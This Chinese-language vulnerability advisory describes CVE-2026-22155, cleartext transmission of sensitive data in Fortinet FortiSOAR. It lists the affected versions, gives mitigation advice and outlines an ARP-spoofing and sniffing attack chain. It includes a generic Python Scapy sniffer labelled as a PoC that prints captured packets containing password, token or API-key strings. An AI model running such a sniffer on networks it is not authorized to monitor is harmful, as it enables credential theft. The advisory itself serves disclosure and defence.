CVE-2026-22155 CVSS 6.5 中危

CVE-2026-22155 Fortinet FortiSOAR 敏感信息明文传输漏洞

披露日期: 2026-04-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-22155

漏洞类型

信息泄露

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Fortinet FortiSOAR

漏洞概述

Fortinet FortiSOAR 在 PaaS 及本地部署版本中存在敏感信息明文传输漏洞。由于系统未对关键数据流进行加密，攻击者可通过网络嗅探截获明文数据，从而造成信息泄露。该漏洞影响范围较广，涉及 7.3 至 7.6 多个版本，建议尽快修复。

技术细节

该漏洞的根本原因在于 Fortinet FortiSOAR 在处理特定通信流量时，未能正确实施加密机制，导致敏感信息以明文形式在网络层传输。根据 CVSS 3.1 向量分析，攻击向量为网络（AV:N），攻击复杂度低（AC:L），且无需用户交互（UI:N）。攻击者只需具备低权限（PR:L）并处于能够捕获流量的网络位置（例如 Shared LAN 或通过 ARP 欺骗进行中间人攻击），即可利用此漏洞。利用过程主要涉及使用数据包捕获工具（如 Wireshark、Tcpdump 或自定义 Scapy 脚本）监听目标端口。由于数据未加密，攻击者可以直接读取 payload 中的敏感字段，如 API 密钥、用户凭证或内部业务数据。这种信息泄露不仅违反了数据安全合规性，还可能成为攻击者横向移动的跳板，造成更严重的安全后果。

攻击链分析

STEP 1

侦察

攻击者识别网络中运行的 Fortinet FortiSOAR 实例及其开放的端口。

STEP 2

网络定位

攻击者设法进入能够截获目标流量的网络位置，例如同一局域网或通过 ARP 欺骗实施中间人攻击。

STEP 3

流量嗅探

攻击者使用 Wireshark、Tcpdump 等工具或自定义脚本监听网络流量，捕获未加密的数据包。

STEP 4

数据提取

攻击者分析捕获的数据包，提取其中的明文敏感信息（如凭证、令牌等）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-22155: Cleartext transmission of sensitive information
# This script demonstrates how an attacker could sniff network traffic to capture unencrypted data.

import scapy.all as scapy

def sniff_packets(interface):
    print(f"[*] Starting packet capture on {interface}...")
    # Filter for HTTP traffic (port 80) or specific FortiSOAR ports if known
    scapy.sniff(iface=interface, store=False, prn=process_packet)

def process_packet(packet):
    if packet.haslayer(scapy.TCP) and packet.haslayer(scapy.Raw):
        payload = packet[scapy.Raw].load
        # Check for potential sensitive keywords
        if b"password" in payload or b"token" in payload or b"api_key" in payload:
            print(f"[!] Potential sensitive data captured: {payload}")

if __name__ == "__main__":
    # Usage: python3 poc.py <network_interface>
    # Example: python3 poc.py eth0
    import sys
    if len(sys.argv) != 2:
        print("Usage: python3 poc.py <interface>")
    else:
        sniff_packets(sys.argv[1])

影响范围

FortiSOAR PaaS 7.6.0 - 7.6.3

FortiSOAR PaaS 7.5.0 - 7.5.2

FortiSOAR PaaS 7.4 (所有版本)

FortiSOAR PaaS 7.3 (所有版本)

FortiSOAR On-premise 7.6.0 - 7.6.2

FortiSOAR On-premise 7.5.0 - 7.5.1

FortiSOAR On-premise 7.4 (所有版本)

FortiSOAR On-premise 7.3 (所有版本)

防御指南

临时缓解措施

建议用户立即升级至修复版本。若无法立即升级，应强制开启 SSL/TLS 加密传输，并通过网络隔离限制对 FortiSOAR 端口的访问，仅允许受信任的 IP 连接。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-22155
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-22155
3 Details https://www.cvedetails.com/cve/CVE-2026-22155/
4 VulDB https://vuldb.com/cve/CVE-2026-22155
5 Link https://fortiguard.fortinet.com/psirt/FG-IR-26-106

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表